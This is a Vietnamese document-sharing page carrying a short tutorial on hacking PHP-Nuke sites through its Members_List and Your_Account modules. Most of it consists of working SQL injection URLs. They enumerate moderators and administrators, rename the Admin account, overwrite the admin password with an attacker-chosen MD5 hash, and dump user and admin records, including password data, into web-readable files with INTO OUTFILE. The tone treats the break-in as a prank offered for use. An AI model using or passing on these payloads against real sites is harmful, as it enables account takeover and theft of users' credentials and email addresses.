1. Trang chủ
  2. » Công Nghệ Thông Tin

Hack Php-Nuke, Khai thác lỗi trong modules Members List.

1 486 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Hack Php-Nuke, Khai thác lỗi trong modules Members List
Thể loại bài viết
Định dạng
Số trang 1
Dung lượng 28 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Hack Php-Nuke, Khai thác lỗi trong modules Members List.

Trang 1

Hack Php-Nuke, Khai thác lỗi trong modules Members List:

trang này đã được đọc lần

Khai thác lỗi trong module PHP-Nuke Lỗi trong module Members_List có thể lấy mật khẩu thành viên và Admin

Cách khai thác như sau:

Trong Module Members_List- Hiển thị tất cả thành viên được sắp xếp theo mật khẩu

http://<trang web phpNuke>/modules.php?name=Members_List&letter=All&sortby=pass- Hiển thị tất cả thành viên được sắp xếp theo UIDhttp://<trang web phpNuke>/modules.php?

name=Members_List&letter=All&sortby=uid Hai câu truy vấn bên trên thì không có gì để để nói Híc híc Bây giờ là câu truy vấn thứ ba- Hiển thị tất cả Moderators http://<trang web phpNuke>/ modules.php?name=Members_List&letter='%20OR%20user_level='2'/*- Hiển thị tất cả

Administrator http://<trang web phpNuke>/modules.php?name=Members_List&letter='%20OR

%20user_level='4'/* </SPAN>

*Khai thác Admin

Chuyển đổi tên "Admin" thành "seamoun" chẳng hạn Khà khà

http://<trang web phpNuke>/modules.php?

name=Your_Account&op=savetheme&theme=',name='seamoun'%20where%20uname='Admin'/

*&uid=[OUR_UID]

Chuyển đổi mật khẩu của Admin (md5) Để có được mật khẩu md5 của mình các bạn có thể tự tạo cho mình một mật khẩu sau đó view trong dữ liệu để lấy mã hoá md5 Khỏi mất công viết cho mệt Ở đây cái mật khẩu md5 của mình đã mã hoá rùi là

b6d0de971824629e987b84d513dc8af0

http://<trang web phpNuke>/modules.php?

name=Your_Account&op=saveuser&email=',pass='b6d0de971824629e987b84d513dc8af0'%20w here%20uname='Admin'/*&uid=[OUR_UID]

Vậy là ta có thể Login với tên của mình và mật khẩu của mình tự tao ra Hì hì

Làm như trên thì mỗi lần ta chỉ làm cho một user thui Vậy thì mệt quá, để lấy tất cả mật khẩu cũng như mail lưu thành tệp email chẳng hạn

Câu lệnh như sau sẽ lưu thông tin của user

http://<trang web phpNuke>/modules.php?name=Your_Account&op=mailpasswd&uname=')

%20OR%201=1%20INTO%20OUTFILE%20'/<đường dẫn web>/email.txt'/*

Sau khi thực hiện lệnh nó sẽ tạo ra một file trên host để view file này thì đường dẫn nó là http://<trang web phpNuke>/email.txt

- Lưu tất cả thông tin của Admin vào một tệp admin.txt

http://<trang web phpNuke>/modules.php?name=Your_Account&op=login&uname='%20OR

%user_level>1%20INTO%20OUTFILE%20'/<đường dẫn web>/admin.txt

Đường dẫn để view trang này thì cũng như trên

Tài liệu tham khảo: phpsecure

Ngày đăng: 02/11/2012, 14:18

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w